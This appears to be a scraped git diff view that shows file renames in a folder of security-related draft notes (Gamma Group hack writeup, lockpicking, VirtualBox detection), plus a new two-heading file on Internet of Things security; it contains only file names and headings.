Draft/Draft/Interesting Things Useful → Draft/Interesting Things Useful View File

Draft/Draft/Interesting Things Useful stuff/Writeup of Gamma Group → Draft/Interesting Things Useful stuff/Writeup of Gamma Group Hack.txt View File

+ 7
- 0
Draft/Internet of View File

@ -0,0 +1,7 @@
##Internet of Things
###Security not included.

Draft/Draft/ → Draft/ View File

Draft/Draft/Lockpicking → Draft/Lockpicking View File

Draft/Draft/ → Draft/ View File

Draft/Draft/Malware/Detect Virtualbox C → Draft/Malware/Detect Virtualbox C prog.txt